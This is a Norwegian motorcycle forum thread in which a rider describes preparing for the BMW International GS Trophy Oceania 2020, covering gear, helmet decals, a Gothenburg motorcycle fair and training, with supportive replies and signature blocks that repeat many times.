x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
- Snikendeugle
- Innlegg: 3617
- Registrert: 10 apr 2013, 19:32
- Motorsykkelen din: MV Agusta F3 800 RC 2018
- Sted: Oslo
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Har ikke fått med meg alle oppdateringene her siden desember. Spennende greier
MV Agusta F3 800 Reparto Corse 2018
Tidl.: KTM RC 390 2015, KTM Duke 690 2013
Tidl.: KTM RC 390 2015, KTM Duke 690 2013
- Epylypzon
- Innlegg: 1227
- Registrert: 22 mar 2012, 06:46
- Motorsykkelen din: BMW F800GS Trophy -12, Yamaha WR426F -02
- Sted: Stange
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Jeg hadde en liten stund snakket om nytt kompaktkamera til samboeren.
En kveld jeg kom sent hjem fikk jeg beskjed om å sette meg i sofaen, hun hadde noe å gi meg. Hmm, hva kan dette være?
Joa, jammen har ikke samboeren ordnet med spleiselag for nytt kamera til turen
Måtte teste campingutstyret, så da var det bare å rigge seg til på sturegulvet ei natt. Hunden syns soveposen var behagelig..
Men, etter 10 min i posen var det alt for varmt. Denne soveposen er etter min mening ikke beregnet for sommertemp. Da var det bare å flytte seg ut på terrassen, det var bedre. Sov godt natta igjennom i 0 +2 grader.
Det ble også ei handlerunde, boxere, sokker, turbukse, minnekort og ladeadapter (canon hevder at man må kjøpe deres overprisa lader, men med PD funker billigere saker.)
Ettersom andre lag begynte å legge ut bilder av sine hjelmer fikk jeg også lyst på navnemerke til våre hjelmer. Jeg så også at de andre lagene har like hjelmer, det hadde jo ikke vi...
Litt prøving av utseende.
Vi, altså jeg og Ronnie(den svenske lagkammeraten) ble invitert ned til Gøteborg på MC Messe, Arto skulle på messe i Finland helgen etter.
Ut på tur, aldri sur.
Vi hadde fått i "oppdrag" å mingle litt rundt GS Trophy monteret på BMW standen. Men vi gjorde stort sett som vi ville, så gikk rundt hele messa noen ganger.
Lørdag og søndag skulle vi opp på scena hvor BMW skulle fortelle om GS Trophy.
Hvor er nøkkelen til sykkelen da?
Ronnie hadde fått laget egne teamjakker, som jeg fikk overlevert
Ronnie, meg og Linus på scena. Ikke akkurat min sterkeste side
I løpet av messa fant jeg/vi ut at jeg burde få byttet hjelmen til den med GS Trophy decaler. Så det skulle selgeren hos MC Huset prøve å fikse Topp service fra den lokale forhandleren nok en gang. Var innom der i går mandag 03. Hjelmen hadde enda ikke kommet, men skulle visst være på plass i dag. Det får vi håpe, ondag setter jeg meg på flyet.
I den forbindelse ble det endret litt på utseende til merkene.
Vi gikk for denne
I New Zealand er dem like nøye som i Australia på hva du tar med inn i landet, derfor måtte en grundig vask av støvlene til.
Jeg bomma nok litt når jeg brukte bilshampoo, det stinka turtlewax av dem etterpå. Så det ble en ny runde med lano og rikelig med lufting.
Et minnekort til og powerbank som klarer å lade kamera.
BMW vanntette sokker var ikke akkurat som jeg trodde
Stappa sekkende fulle og tok det med på jobb for å få en bedre oversikt over alt. Noe skal byttes ut/suppleres.
Prøvde buksa igjen, den hadde jammen ikke krympa i løpet av vinteret. Men blitt større (Jeg prøvde dressen hos forhandler i september).
Treningen har vist forandring, både på vekta og livvidda. Derfor måtte jeg skaffe bukseseler.
Treningssykkelen ble levert i går
En kveld jeg kom sent hjem fikk jeg beskjed om å sette meg i sofaen, hun hadde noe å gi meg. Hmm, hva kan dette være?
Joa, jammen har ikke samboeren ordnet med spleiselag for nytt kamera til turen
Måtte teste campingutstyret, så da var det bare å rigge seg til på sturegulvet ei natt. Hunden syns soveposen var behagelig..
Men, etter 10 min i posen var det alt for varmt. Denne soveposen er etter min mening ikke beregnet for sommertemp. Da var det bare å flytte seg ut på terrassen, det var bedre. Sov godt natta igjennom i 0 +2 grader.
Det ble også ei handlerunde, boxere, sokker, turbukse, minnekort og ladeadapter (canon hevder at man må kjøpe deres overprisa lader, men med PD funker billigere saker.)
Ettersom andre lag begynte å legge ut bilder av sine hjelmer fikk jeg også lyst på navnemerke til våre hjelmer. Jeg så også at de andre lagene har like hjelmer, det hadde jo ikke vi...
Litt prøving av utseende.
Vi, altså jeg og Ronnie(den svenske lagkammeraten) ble invitert ned til Gøteborg på MC Messe, Arto skulle på messe i Finland helgen etter.
Ut på tur, aldri sur.
Vi hadde fått i "oppdrag" å mingle litt rundt GS Trophy monteret på BMW standen. Men vi gjorde stort sett som vi ville, så gikk rundt hele messa noen ganger.
Lørdag og søndag skulle vi opp på scena hvor BMW skulle fortelle om GS Trophy.
Hvor er nøkkelen til sykkelen da?
Ronnie hadde fått laget egne teamjakker, som jeg fikk overlevert
Ronnie, meg og Linus på scena. Ikke akkurat min sterkeste side
I løpet av messa fant jeg/vi ut at jeg burde få byttet hjelmen til den med GS Trophy decaler. Så det skulle selgeren hos MC Huset prøve å fikse Topp service fra den lokale forhandleren nok en gang. Var innom der i går mandag 03. Hjelmen hadde enda ikke kommet, men skulle visst være på plass i dag. Det får vi håpe, ondag setter jeg meg på flyet.
I den forbindelse ble det endret litt på utseende til merkene.
Vi gikk for denne
I New Zealand er dem like nøye som i Australia på hva du tar med inn i landet, derfor måtte en grundig vask av støvlene til.
Jeg bomma nok litt når jeg brukte bilshampoo, det stinka turtlewax av dem etterpå. Så det ble en ny runde med lano og rikelig med lufting.
Et minnekort til og powerbank som klarer å lade kamera.
BMW vanntette sokker var ikke akkurat som jeg trodde
Stappa sekkende fulle og tok det med på jobb for å få en bedre oversikt over alt. Noe skal byttes ut/suppleres.
Prøvde buksa igjen, den hadde jammen ikke krympa i løpet av vinteret. Men blitt større (Jeg prøvde dressen hos forhandler i september).
Treningen har vist forandring, både på vekta og livvidda. Derfor måtte jeg skaffe bukseseler.
Treningssykkelen ble levert i går
Mine mc er:
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Utrolig artig å følge deg gjennom dette eventyret, og se hvor mye flott utstyr du får til turen. Helt klart at BMW legger mye penger i dette arrangementet, de får nok mye bra publisitet, men likevel imponerende. Ønsker deg lykke til på eventyret som venter i New Zealand Og ser frem til fyldig referat underveis og i etterkant